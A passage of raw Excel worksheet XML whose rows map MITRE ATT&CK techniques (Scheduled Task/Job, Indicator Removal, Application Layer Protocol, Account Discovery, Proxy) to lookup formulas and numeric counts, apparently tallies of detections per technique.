      <c r="CE17" s="12">
        <v>0</v>
      </c>
      <c r="CF17" s="12">
        <v>0</v>
      </c>
      <c r="CG17" s="13">
        <v>0</v>
      </c>
      <c r="CH17" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="18" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A18" s="4">
        <f t="shared" si="13"/>
        <v>16</v>
      </c>
      <c r="B18" s="4" t="str">
        <f>IFERROR(VLOOKUP(A18,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1053</v>
      </c>
      <c r="C18" s="493" t="str">
        <f>IFERROR(VLOOKUP(B18,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Scheduled Task/Job</v>
      </c>
      <c r="D18" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B18)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E18" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F18" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (2)</v>
      </c>
      <c r="G18" s="292">
        <v>0</v>
      </c>
      <c r="H18" s="322">
        <v>0</v>
      </c>
      <c r="I18" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J18" s="12">
        <v>0</v>
      </c>
      <c r="K18" s="13">
        <v>0</v>
      </c>
      <c r="L18" s="394">
        <v>0</v>
      </c>
      <c r="M18" s="322">
        <v>14</v>
      </c>
      <c r="N18" s="322">
        <v>4</v>
      </c>
      <c r="O18" s="322" t="str">
        <f t="shared" si="1"/>
        <v>4 (14)</v>
      </c>
      <c r="P18" s="12">
        <v>4</v>
      </c>
      <c r="Q18" s="13">
        <v>1</v>
      </c>
      <c r="R18" s="394">
        <v>2</v>
      </c>
      <c r="S18" s="292">
        <v>14</v>
      </c>
      <c r="T18" s="322">
        <v>4</v>
      </c>
      <c r="U18" s="322" t="str">
        <f t="shared" si="2"/>
        <v>4 (14)</v>
      </c>
      <c r="V18" s="12">
        <v>4</v>
      </c>
      <c r="W18" s="13">
        <v>1</v>
      </c>
      <c r="X18" s="394">
        <v>2</v>
      </c>
      <c r="Y18" s="392">
        <v>24</v>
      </c>
      <c r="Z18" s="392">
        <v>7</v>
      </c>
      <c r="AA18" s="322" t="str">
        <f t="shared" si="3"/>
        <v>7 (24)</v>
      </c>
      <c r="AB18" s="392">
        <v>6</v>
      </c>
      <c r="AC18" s="16">
        <v>1</v>
      </c>
      <c r="AD18" s="394">
        <v>2</v>
      </c>
      <c r="AE18" s="392">
        <v>38</v>
      </c>
      <c r="AF18" s="392">
        <v>13</v>
      </c>
      <c r="AG18" s="322" t="str">
        <f t="shared" si="4"/>
        <v>13 (38)</v>
      </c>
      <c r="AH18" s="392">
        <v>10</v>
      </c>
      <c r="AI18" s="16">
        <v>1</v>
      </c>
      <c r="AJ18" s="394">
        <v>2</v>
      </c>
      <c r="AK18" s="392">
        <v>62</v>
      </c>
      <c r="AL18" s="392">
        <v>20</v>
      </c>
      <c r="AM18" s="322" t="str">
        <f t="shared" si="5"/>
        <v>20 (62)</v>
      </c>
      <c r="AN18" s="392">
        <v>16</v>
      </c>
      <c r="AO18" s="16">
        <v>1</v>
      </c>
      <c r="AP18" s="394">
        <v>2</v>
      </c>
      <c r="AQ18" s="292">
        <v>0</v>
      </c>
      <c r="AR18" s="322">
        <v>0</v>
      </c>
      <c r="AS18" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT18" s="12">
        <v>0</v>
      </c>
      <c r="AU18" s="13">
        <v>0</v>
      </c>
      <c r="AV18" s="394">
        <v>0</v>
      </c>
      <c r="AW18" s="392">
        <v>5</v>
      </c>
      <c r="AX18" s="392">
        <v>3</v>
      </c>
      <c r="AY18" s="322" t="str">
        <f t="shared" si="7"/>
        <v>3 (5)</v>
      </c>
      <c r="AZ18" s="4">
        <v>3</v>
      </c>
      <c r="BA18" s="16">
        <v>1</v>
      </c>
      <c r="BB18" s="394">
        <v>1</v>
      </c>
      <c r="BC18" s="292">
        <v>19</v>
      </c>
      <c r="BD18" s="322">
        <v>7</v>
      </c>
      <c r="BE18" s="322" t="str">
        <f t="shared" si="8"/>
        <v>7 (19)</v>
      </c>
      <c r="BF18" s="12">
        <v>7</v>
      </c>
      <c r="BG18" s="13">
        <v>1</v>
      </c>
      <c r="BH18" s="394">
        <v>2</v>
      </c>
      <c r="BI18" s="292">
        <v>4</v>
      </c>
      <c r="BJ18" s="322">
        <v>3</v>
      </c>
      <c r="BK18" s="322" t="str">
        <f t="shared" si="9"/>
        <v>3 (4)</v>
      </c>
      <c r="BL18" s="12">
        <v>2</v>
      </c>
      <c r="BM18" s="13">
        <v>1</v>
      </c>
      <c r="BN18" s="394">
        <v>2</v>
      </c>
      <c r="BO18" s="292">
        <v>6</v>
      </c>
      <c r="BP18" s="322">
        <v>5</v>
      </c>
      <c r="BQ18" s="322" t="str">
        <f t="shared" si="10"/>
        <v>5 (6)</v>
      </c>
      <c r="BR18" s="12">
        <v>2</v>
      </c>
      <c r="BS18" s="12">
        <v>1</v>
      </c>
      <c r="BT18" s="13">
        <v>1</v>
      </c>
      <c r="BU18" s="394">
        <v>2</v>
      </c>
      <c r="BV18" s="292">
        <v>1</v>
      </c>
      <c r="BW18" s="322">
        <v>1</v>
      </c>
      <c r="BX18" s="322" t="str">
        <f t="shared" si="11"/>
        <v>1 (1)</v>
      </c>
      <c r="BY18" s="12">
        <v>1</v>
      </c>
      <c r="BZ18" s="13">
        <v>1</v>
      </c>
      <c r="CA18" s="394">
        <v>1</v>
      </c>
      <c r="CB18" s="292">
        <v>12</v>
      </c>
      <c r="CC18" s="322">
        <v>1</v>
      </c>
      <c r="CD18" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (12)</v>
      </c>
      <c r="CE18" s="12">
        <v>0</v>
      </c>
      <c r="CF18" s="12">
        <v>1</v>
      </c>
      <c r="CG18" s="13">
        <v>1</v>
      </c>
      <c r="CH18" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="19" spans="1:86" ht="15" customHeight="1">
      <c r="A19" s="4">
        <f t="shared" si="13"/>
        <v>17</v>
      </c>
      <c r="B19" s="4" t="str">
        <f>IFERROR(VLOOKUP(A19,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1070</v>
      </c>
      <c r="C19" s="493" t="str">
        <f>IFERROR(VLOOKUP(B19,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Indicator Removal</v>
      </c>
      <c r="D19" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B19)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E19" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F19" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (1)</v>
      </c>
      <c r="G19" s="292">
        <v>0</v>
      </c>
      <c r="H19" s="322">
        <v>0</v>
      </c>
      <c r="I19" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J19" s="12">
        <v>0</v>
      </c>
      <c r="K19" s="13">
        <v>0</v>
      </c>
      <c r="L19" s="394">
        <v>0</v>
      </c>
      <c r="M19" s="322">
        <v>0</v>
      </c>
      <c r="N19" s="322">
        <v>0</v>
      </c>
      <c r="O19" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P19" s="12">
        <v>0</v>
      </c>
      <c r="Q19" s="13">
        <v>0</v>
      </c>
      <c r="R19" s="394">
        <v>0</v>
      </c>
      <c r="S19" s="292">
        <v>0</v>
      </c>
      <c r="T19" s="322">
        <v>0</v>
      </c>
      <c r="U19" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V19" s="12">
        <v>0</v>
      </c>
      <c r="W19" s="13">
        <v>0</v>
      </c>
      <c r="X19" s="394">
        <v>0</v>
      </c>
      <c r="Y19" s="392">
        <v>0</v>
      </c>
      <c r="Z19" s="392">
        <v>0</v>
      </c>
      <c r="AA19" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB19" s="392">
        <v>0</v>
      </c>
      <c r="AC19" s="16">
        <v>0</v>
      </c>
      <c r="AD19" s="394">
        <v>0</v>
      </c>
      <c r="AE19" s="392">
        <v>0</v>
      </c>
      <c r="AF19" s="392">
        <v>0</v>
      </c>
      <c r="AG19" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH19" s="392">
        <v>0</v>
      </c>
      <c r="AI19" s="16">
        <v>0</v>
      </c>
      <c r="AJ19" s="394">
        <v>0</v>
      </c>
      <c r="AK19" s="392">
        <v>0</v>
      </c>
      <c r="AL19" s="392">
        <v>0</v>
      </c>
      <c r="AM19" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="AN19" s="392">
        <v>0</v>
      </c>
      <c r="AO19" s="16">
        <v>0</v>
      </c>
      <c r="AP19" s="394">
        <v>0</v>
      </c>
      <c r="AQ19" s="292">
        <v>0</v>
      </c>
      <c r="AR19" s="322">
        <v>0</v>
      </c>
      <c r="AS19" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT19" s="12">
        <v>0</v>
      </c>
      <c r="AU19" s="13">
        <v>0</v>
      </c>
      <c r="AV19" s="394">
        <v>0</v>
      </c>
      <c r="AW19" s="392">
        <v>0</v>
      </c>
      <c r="AX19" s="392">
        <v>0</v>
      </c>
      <c r="AY19" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ19" s="4">
        <v>0</v>
      </c>
      <c r="BA19" s="16">
        <v>0</v>
      </c>
      <c r="BB19" s="394">
        <v>0</v>
      </c>
      <c r="BC19" s="292">
        <v>0</v>
      </c>
      <c r="BD19" s="322">
        <v>0</v>
      </c>
      <c r="BE19" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF19" s="12">
        <v>0</v>
      </c>
      <c r="BG19" s="13">
        <v>0</v>
      </c>
      <c r="BH19" s="394">
        <v>0</v>
      </c>
      <c r="BI19" s="292">
        <v>0</v>
      </c>
      <c r="BJ19" s="322">
        <v>0</v>
      </c>
      <c r="BK19" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL19" s="12">
        <v>0</v>
      </c>
      <c r="BM19" s="13">
        <v>0</v>
      </c>
      <c r="BN19" s="394">
        <v>0</v>
      </c>
      <c r="BO19" s="292">
        <v>3</v>
      </c>
      <c r="BP19" s="322">
        <v>3</v>
      </c>
      <c r="BQ19" s="322" t="str">
        <f t="shared" si="10"/>
        <v>3 (3)</v>
      </c>
      <c r="BR19" s="12">
        <v>0</v>
      </c>
      <c r="BS19" s="12">
        <v>3</v>
      </c>
      <c r="BT19" s="13">
        <v>1</v>
      </c>
      <c r="BU19" s="394">
        <v>1</v>
      </c>
      <c r="BV19" s="292">
        <v>0</v>
      </c>
      <c r="BW19" s="322">
        <v>0</v>
      </c>
      <c r="BX19" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY19" s="12">
        <v>0</v>
      </c>
      <c r="BZ19" s="13">
        <v>0</v>
      </c>
      <c r="CA19" s="394">
        <v>0</v>
      </c>
      <c r="CB19" s="292">
        <v>1</v>
      </c>
      <c r="CC19" s="322">
        <v>1</v>
      </c>
      <c r="CD19" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (1)</v>
      </c>
      <c r="CE19" s="12">
        <v>0</v>
      </c>
      <c r="CF19" s="12">
        <v>1</v>
      </c>
      <c r="CG19" s="13">
        <v>1</v>
      </c>
      <c r="CH19" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:86" ht="15" customHeight="1">
      <c r="A20" s="4">
        <f t="shared" si="13"/>
        <v>18</v>
      </c>
      <c r="B20" s="4" t="str">
        <f>IFERROR(VLOOKUP(A20,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1071</v>
      </c>
      <c r="C20" s="493" t="str">
        <f>IFERROR(VLOOKUP(B20,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Application Layer Protocol</v>
      </c>
      <c r="D20" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B20)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E20" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>198</v>
      </c>
      <c r="F20" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (198)</v>
      </c>
      <c r="G20" s="292">
        <v>204</v>
      </c>
      <c r="H20" s="322">
        <v>10</v>
      </c>
      <c r="I20" s="322" t="str">
        <f t="shared" si="0"/>
        <v>10 (204)</v>
      </c>
      <c r="J20" s="12">
        <v>1</v>
      </c>
      <c r="K20" s="13">
        <v>1</v>
      </c>
      <c r="L20" s="394">
        <v>10</v>
      </c>
      <c r="M20" s="322">
        <v>0</v>
      </c>
      <c r="N20" s="322">
        <v>0</v>
      </c>
      <c r="O20" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P20" s="12">
        <v>0</v>
      </c>
      <c r="Q20" s="13">
        <v>0</v>
      </c>
      <c r="R20" s="394">
        <v>0</v>
      </c>
      <c r="S20" s="292">
        <v>204</v>
      </c>
      <c r="T20" s="322">
        <v>10</v>
      </c>
      <c r="U20" s="322" t="str">
        <f t="shared" si="2"/>
        <v>10 (204)</v>
      </c>
      <c r="V20" s="12">
        <v>1</v>
      </c>
      <c r="W20" s="13">
        <v>1</v>
      </c>
      <c r="X20" s="394">
        <v>10</v>
      </c>
      <c r="Y20" s="392">
        <v>205</v>
      </c>
      <c r="Z20" s="392">
        <v>11</v>
      </c>
      <c r="AA20" s="322" t="str">
        <f t="shared" si="3"/>
        <v>11 (205)</v>
      </c>
      <c r="AB20" s="392">
        <v>2</v>
      </c>
      <c r="AC20" s="16">
        <v>1</v>
      </c>
      <c r="AD20" s="394">
        <v>11</v>
      </c>
      <c r="AE20" s="392">
        <v>12</v>
      </c>
      <c r="AF20" s="392">
        <v>11</v>
      </c>
      <c r="AG20" s="322" t="str">
        <f t="shared" si="4"/>
        <v>11 (12)</v>
      </c>
      <c r="AH20" s="392">
        <v>4</v>
      </c>
      <c r="AI20" s="16">
        <v>1</v>
      </c>
      <c r="AJ20" s="394">
        <v>6</v>
      </c>
      <c r="AK20" s="392">
        <v>217</v>
      </c>
      <c r="AL20" s="392">
        <v>22</v>
      </c>
      <c r="AM20" s="322" t="str">
        <f t="shared" si="5"/>
        <v>22 (217)</v>
      </c>
      <c r="AN20" s="392">
        <v>6</v>
      </c>
      <c r="AO20" s="16">
        <v>1</v>
      </c>
      <c r="AP20" s="394">
        <v>13</v>
      </c>
      <c r="AQ20" s="292">
        <v>0</v>
      </c>
      <c r="AR20" s="322">
        <v>0</v>
      </c>
      <c r="AS20" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT20" s="12">
        <v>0</v>
      </c>
      <c r="AU20" s="13">
        <v>0</v>
      </c>
      <c r="AV20" s="394">
        <v>0</v>
      </c>
      <c r="AW20" s="392">
        <v>0</v>
      </c>
      <c r="AX20" s="392">
        <v>0</v>
      </c>
      <c r="AY20" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ20" s="4">
        <v>0</v>
      </c>
      <c r="BA20" s="16">
        <v>0</v>
      </c>
      <c r="BB20" s="394">
        <v>0</v>
      </c>
      <c r="BC20" s="292">
        <v>204</v>
      </c>
      <c r="BD20" s="322">
        <v>10</v>
      </c>
      <c r="BE20" s="322" t="str">
        <f t="shared" si="8"/>
        <v>10 (204)</v>
      </c>
      <c r="BF20" s="12">
        <v>1</v>
      </c>
      <c r="BG20" s="13">
        <v>1</v>
      </c>
      <c r="BH20" s="394">
        <v>10</v>
      </c>
      <c r="BI20" s="292">
        <v>0</v>
      </c>
      <c r="BJ20" s="322">
        <v>0</v>
      </c>
      <c r="BK20" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL20" s="12">
        <v>0</v>
      </c>
      <c r="BM20" s="13">
        <v>0</v>
      </c>
      <c r="BN20" s="394">
        <v>0</v>
      </c>
      <c r="BO20" s="292">
        <v>198</v>
      </c>
      <c r="BP20" s="322">
        <v>198</v>
      </c>
      <c r="BQ20" s="322" t="str">
        <f t="shared" si="10"/>
        <v>198 (198)</v>
      </c>
      <c r="BR20" s="12">
        <v>0</v>
      </c>
      <c r="BS20" s="12">
        <v>2</v>
      </c>
      <c r="BT20" s="13">
        <v>1</v>
      </c>
      <c r="BU20" s="394">
        <v>198</v>
      </c>
      <c r="BV20" s="292">
        <v>5</v>
      </c>
      <c r="BW20" s="322">
        <v>5</v>
      </c>
      <c r="BX20" s="322" t="str">
        <f t="shared" si="11"/>
        <v>5 (5)</v>
      </c>
      <c r="BY20" s="12">
        <v>1</v>
      </c>
      <c r="BZ20" s="13">
        <v>1</v>
      </c>
      <c r="CA20" s="394">
        <v>5</v>
      </c>
      <c r="CB20" s="292">
        <v>5</v>
      </c>
      <c r="CC20" s="322">
        <v>5</v>
      </c>
      <c r="CD20" s="322" t="str">
        <f t="shared" si="12"/>
        <v>5 (5)</v>
      </c>
      <c r="CE20" s="12">
        <v>0</v>
      </c>
      <c r="CF20" s="12">
        <v>1</v>
      </c>
      <c r="CG20" s="13">
        <v>1</v>
      </c>
      <c r="CH20" s="394">
        <v>5</v>
      </c>
    </row>
    <row r="21" spans="1:86" ht="15" customHeight="1">
      <c r="A21" s="4">
        <f t="shared" si="13"/>
        <v>19</v>
      </c>
      <c r="B21" s="4" t="str">
        <f>IFERROR(VLOOKUP(A21,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1087</v>
      </c>
      <c r="C21" s="493" t="str">
        <f>IFERROR(VLOOKUP(B21,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Account Discovery</v>
      </c>
      <c r="D21" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B21)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E21" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F21" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (2)</v>
      </c>
      <c r="G21" s="292">
        <v>24</v>
      </c>
      <c r="H21" s="322">
        <v>2</v>
      </c>
      <c r="I21" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (24)</v>
      </c>
      <c r="J21" s="12">
        <v>2</v>
      </c>
      <c r="K21" s="13">
        <v>1</v>
      </c>
      <c r="L21" s="394">
        <v>1</v>
      </c>
      <c r="M21" s="322">
        <v>10</v>
      </c>
      <c r="N21" s="322">
        <v>3</v>
      </c>
      <c r="O21" s="322" t="str">
        <f t="shared" si="1"/>
        <v>3 (10)</v>
      </c>
      <c r="P21" s="12">
        <v>3</v>
      </c>
      <c r="Q21" s="13">
        <v>1</v>
      </c>
      <c r="R21" s="394">
        <v>2</v>
      </c>
      <c r="S21" s="292">
        <v>34</v>
      </c>
      <c r="T21" s="322">
        <v>5</v>
      </c>
      <c r="U21" s="322" t="str">
        <f t="shared" si="2"/>
        <v>5 (34)</v>
      </c>
      <c r="V21" s="12">
        <v>5</v>
      </c>
      <c r="W21" s="13">
        <v>1</v>
      </c>
      <c r="X21" s="394">
        <v>2</v>
      </c>
      <c r="Y21" s="392">
        <v>42</v>
      </c>
      <c r="Z21" s="392">
        <v>10</v>
      </c>
      <c r="AA21" s="322" t="str">
        <f t="shared" si="3"/>
        <v>10 (42)</v>
      </c>
      <c r="AB21" s="392">
        <v>9</v>
      </c>
      <c r="AC21" s="16">
        <v>1</v>
      </c>
      <c r="AD21" s="394">
        <v>2</v>
      </c>
      <c r="AE21" s="392">
        <v>27</v>
      </c>
      <c r="AF21" s="392">
        <v>10</v>
      </c>
      <c r="AG21" s="322" t="str">
        <f t="shared" si="4"/>
        <v>10 (27)</v>
      </c>
      <c r="AH21" s="392">
        <v>10</v>
      </c>
      <c r="AI21" s="16">
        <v>1</v>
      </c>
      <c r="AJ21" s="394">
        <v>2</v>
      </c>
      <c r="AK21" s="392">
        <v>69</v>
      </c>
      <c r="AL21" s="392">
        <v>20</v>
      </c>
      <c r="AM21" s="322" t="str">
        <f t="shared" si="5"/>
        <v>20 (69)</v>
      </c>
      <c r="AN21" s="392">
        <v>19</v>
      </c>
      <c r="AO21" s="16">
        <v>1</v>
      </c>
      <c r="AP21" s="394">
        <v>2</v>
      </c>
      <c r="AQ21" s="292">
        <v>0</v>
      </c>
      <c r="AR21" s="322">
        <v>0</v>
      </c>
      <c r="AS21" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT21" s="12">
        <v>0</v>
      </c>
      <c r="AU21" s="13">
        <v>0</v>
      </c>
      <c r="AV21" s="394">
        <v>0</v>
      </c>
      <c r="AW21" s="392">
        <v>4</v>
      </c>
      <c r="AX21" s="392">
        <v>3</v>
      </c>
      <c r="AY21" s="322" t="str">
        <f t="shared" si="7"/>
        <v>3 (4)</v>
      </c>
      <c r="AZ21" s="4">
        <v>3</v>
      </c>
      <c r="BA21" s="16">
        <v>1</v>
      </c>
      <c r="BB21" s="394">
        <v>1</v>
      </c>
      <c r="BC21" s="292">
        <v>38</v>
      </c>
      <c r="BD21" s="322">
        <v>8</v>
      </c>
      <c r="BE21" s="322" t="str">
        <f t="shared" si="8"/>
        <v>8 (38)</v>
      </c>
      <c r="BF21" s="12">
        <v>8</v>
      </c>
      <c r="BG21" s="13">
        <v>1</v>
      </c>
      <c r="BH21" s="394">
        <v>2</v>
      </c>
      <c r="BI21" s="292">
        <v>2</v>
      </c>
      <c r="BJ21" s="322">
        <v>2</v>
      </c>
      <c r="BK21" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (2)</v>
      </c>
      <c r="BL21" s="12">
        <v>1</v>
      </c>
      <c r="BM21" s="13">
        <v>1</v>
      </c>
      <c r="BN21" s="394">
        <v>2</v>
      </c>
      <c r="BO21" s="292">
        <v>2</v>
      </c>
      <c r="BP21" s="322">
        <v>2</v>
      </c>
      <c r="BQ21" s="322" t="str">
        <f t="shared" si="10"/>
        <v>2 (2)</v>
      </c>
      <c r="BR21" s="12">
        <v>1</v>
      </c>
      <c r="BS21" s="12">
        <v>0</v>
      </c>
      <c r="BT21" s="13">
        <v>1</v>
      </c>
      <c r="BU21" s="394">
        <v>2</v>
      </c>
      <c r="BV21" s="292">
        <v>0</v>
      </c>
      <c r="BW21" s="322">
        <v>0</v>
      </c>
      <c r="BX21" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY21" s="12">
        <v>0</v>
      </c>
      <c r="BZ21" s="13">
        <v>0</v>
      </c>
      <c r="CA21" s="394">
        <v>0</v>
      </c>
      <c r="CB21" s="292">
        <v>0</v>
      </c>
      <c r="CC21" s="322">
        <v>0</v>
      </c>
      <c r="CD21" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE21" s="12">
        <v>0</v>
      </c>
      <c r="CF21" s="12">
        <v>0</v>
      </c>
      <c r="CG21" s="13">
        <v>0</v>
      </c>
      <c r="CH21" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="1:86" ht="15" customHeight="1">
      <c r="A22" s="4">
        <f t="shared" si="13"/>
        <v>20</v>
      </c>
      <c r="B22" s="4" t="str">
        <f>IFERROR(VLOOKUP(A22,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1090</v>
      </c>
      <c r="C22" s="493" t="str">
        <f>IFERROR(VLOOKUP(B22,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Proxy</v>
      </c>
      <c r="D22" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B22)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E22" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>23</v>
      </c>
      <c r="F22" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (23)</v>
      </c>
      <c r="G22" s="292">
        <v>2</v>
      </c>
      <c r="H22" s="322">
        <v>2</v>
      </c>
      <c r="I22" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (2)</v>
      </c>
      <c r="J22" s="12">
        <v>1</v>
      </c>
      <c r="K22" s="13">
        <v>1</v>
      </c>
      <c r="L22" s="394">
        <v>2</v>
      </c>
      <c r="M22" s="322">
        <v>6</v>
      </c>
      <c r="N22" s="322">
        <v>6</v>
      </c>
      <c r="O22" s="322" t="str">
        <f t="shared" si="1"/>
        <v>6 (6)</v>
      </c>
      <c r="P22" s="12">
        <v>3</v>
      </c>
      <c r="Q22" s="13">
        <v>1</v>
      </c>
      <c r="R22" s="394">
        <v>2</v>
      </c>
      <c r="S22" s="292">
        <v>8</v>
      </c>
      <c r="T22" s="322">
        <v>8</v>
      </c>
      <c r="U22" s="322" t="str">
        <f t="shared" si="2"/>
        <v>8 (8)</v>
      </c>
      <c r="V22" s="12">
        <v>4</v>
      </c>
      <c r="W22" s="13">
        <v>1</v>
      </c>
      <c r="X22" s="394">
        <v>3</v>
      </c>
      <c r="Y22" s="392">
        <v>43</v>
      </c>
      <c r="Z22" s="392">
        <v>17</v>
      </c>
      <c r="AA22" s="322" t="str">
        <f t="shared" si="3"/>
        <v>17 (43)</v>
      </c>
      <c r="AB22" s="392">
        <v>2</v>
      </c>
      <c r="AC22" s="16">
        <v>1</v>
      </c>
      <c r="AD22" s="394">
        <v>15</v>
      </c>
      <c r="AE22" s="392">
        <v>42</v>
      </c>
      <c r="AF22" s="392">
        <v>12</v>
      </c>
      <c r="AG22" s="322" t="str">
        <f t="shared" si="4"/>
        <v>12 (42)</v>
      </c>
      <c r="AH22" s="392">
        <v>6</v>
      </c>
      <c r="AI22" s="16">
        <v>1</v>
      </c>
      <c r="AJ22" s="394">
        <v>5</v>
      </c>
      <c r="AK22" s="392">
        <v>85</v>
      </c>
      <c r="AL22" s="392">
        <v>29</v>
      </c>
      <c r="AM22" s="322" t="str">
        <f t="shared" si="5"/>
        <v>29 (85)</v>
      </c>
      <c r="AN22" s="392">
        <v>8</v>
      </c>
      <c r="AO22" s="16">
        <v>1</v>
      </c>
      <c r="AP22" s="394">
        <v>17</v>
      </c>
      <c r="AQ22" s="292">
        <v>0</v>
      </c>
      <c r="AR22" s="322">
        <v>0</v>
      </c>
      <c r="AS22" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT22" s="12">
        <v>0</v>
      </c>
      <c r="AU22" s="13">
        <v>0</v>
      </c>
      <c r="AV22" s="394">
        <v>0</v>
      </c>
      <c r="AW22" s="392">
        <v>0</v>
      </c>
      <c r="AX22" s="392">
        <v>0</v>
      </c>
      <c r="AY22" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ22" s="4">
        <v>0</v>
      </c>
      <c r="BA22" s="16">
        <v>0</v>
      </c>
      <c r="BB22" s="394">
        <v>0</v>
      </c>
      <c r="BC22" s="292">
        <v>8</v>
      </c>
      <c r="BD22" s="322">
        <v>8</v>
      </c>
      <c r="BE22" s="322" t="str">
        <f t="shared" si="8"/>
        <v>8 (8)</v>
      </c>
      <c r="BF22" s="12">
        <v>4</v>
      </c>
      <c r="BG22" s="13">
        <v>1</v>
      </c>
      <c r="BH22" s="394">
        <v>3</v>
      </c>
      <c r="BI22" s="292">
        <v>7</v>
      </c>
      <c r="BJ22" s="322">
        <v>4</v>
      </c>
      <c r="BK22" s="322" t="str">
        <f t="shared" si="9"/>
        <v>4 (7)</v>
      </c>
      <c r="BL22" s="12">
        <v>1</v>
      </c>
      <c r="BM22" s="13">
        <v>1</v>
      </c>
      <c r="BN22" s="394">
        <v>4</v>
      </c>
      <c r="BO22" s="292">
        <v>61</v>
      </c>
      <c r="BP22" s="322">
        <v>29</v>
      </c>
      <c r="BQ22" s="322" t="str">
        <f t="shared" si="10"/>
        <v>29 (61)</v>
      </c>
      <c r="BR22" s="12">
